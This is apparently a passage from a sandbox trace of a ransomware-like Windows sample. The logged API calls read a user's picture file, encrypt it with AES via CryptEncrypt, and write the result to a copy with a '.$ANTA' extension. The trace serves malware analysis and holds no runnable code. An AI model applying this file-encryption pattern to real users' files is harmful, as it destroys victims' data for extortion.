(HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0088.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0088.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0088.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0088.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0088.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0088.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0088.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0088.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0088.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0088.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0088.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0088.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0088.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0088.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0088.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0088.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0088.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0088.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0088.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0088.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0088.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0088.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391dc8 [0088.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0088.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0088.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0088.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0088.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0088.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0088.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43596c0 | out: hHeap=0x1780000) returned 1 [0088.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0088.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0088.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0088.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391dc8 | out: hHeap=0x1780000) returned 1 [0088.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0088.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0088.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0088.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0088.794] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0088.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0088.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0088.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0088.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0088.795] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\i5q_5Bq6.bmp.$ANTA" (normalized: "c:\\users\\fd1hvy\\pictures\\i5q_5bq6.bmp.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0088.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0088.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0088.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0088.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0088.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0088.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0088.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0088.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0088.796] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0088.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0088.796] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0088.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0088.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0088.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0088.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0088.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0088.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0088.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0088.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0088.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0088.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0088.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0088.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e05020 [0088.799] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0088.799] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0088.802] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ef28*=0x297e, lpOverlapped=0x0) returned 1 [0088.802] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0088.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0088.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1297e) returned 0x4516010 [0088.807] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0088.809] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0088.809] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0088.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0088.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0088.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0088.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0088.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0088.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0088.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0088.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0088.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0088.809] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0088.809] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0088.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0088.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0088.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0088.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0088.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1797128 [0088.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0088.810] CryptGetKeyParam (in: hKey=0x41ac640, dwParam=0x7, pbData=0x43e2700, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2700*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0088.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0088.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea0b8 [0088.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0088.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0088.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0088.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0088.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0088.810] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0088.810] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0088.810] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0088.811] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0088.812] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0088.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0088.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0088.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0088.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0088.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43ca508 [0088.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca508, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0088.812] CryptEncrypt (in: hKey=0x41ac640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x1297e, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x12980) returned 1 [0088.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0088.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea730 [0088.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0088.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0088.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0088.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0088.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0088.812] CharLowerBuffW (in: lpsz="byte[76161]", cchLength=0xb | out: lpsz="byte[76161]") returned 0xb [0088.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0088.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0088.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0088.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0088.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0088.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0088.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0088.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0088.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0088.815] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0088.815] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0088.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0088.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0088.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0088.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0088.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43ca928 [0088.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca928, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0088.815] CryptEncrypt (in: hKey=0x41ac640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49ac990*, pdwDataLen=0x144e790*=0x1297e, dwBufLen=0x12980 | out: pbData=0x49ac990*, pdwDataLen=0x144e790*=0x12980) returned 1 [0088.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0088.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9818 [0088.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0088.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0088.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0088.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0088.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0088.816] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0088.816] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0088.816] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0088.816] WriteFile (in: hFile=0x258, lpBuffer=0x4528998*, nNumberOfBytesToWrite=0x12980, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x4528998*, lpNumberOfBytesWritten=0x144f194*=0x12980, lpOverlapped=0x0) returned 1 [0088.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0088.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4528998 | out: hHeap=0x1780000) returned 1 [0088.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0088.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0088.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0088.818] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0088.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0088.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0088.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0088.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0088.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0088.818] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0088.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0088.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0088.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0088.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0088.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0088.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0088.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0088.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca358 [0088.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0088.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3e8 [0088.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca370 [0088.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0088.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca310 [0088.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca250 [0088.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0088.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0088.819] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0088.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0088.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0088.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0088.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2850 [0088.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0088.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0088.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0088.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0088.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca2f8 [0088.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0088.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0088.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0088.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0088.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0088.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0088.820] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0088.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0088.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0088.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0088.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0088.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0088.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0088.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0088.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0088.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0088.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0088.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0088.820] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0088.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0088.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0088.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0088.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0088.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0088.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0088.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0088.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0088.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca1a8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0088.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0088.821] GetProcAddress (hModule=0x756e0000, 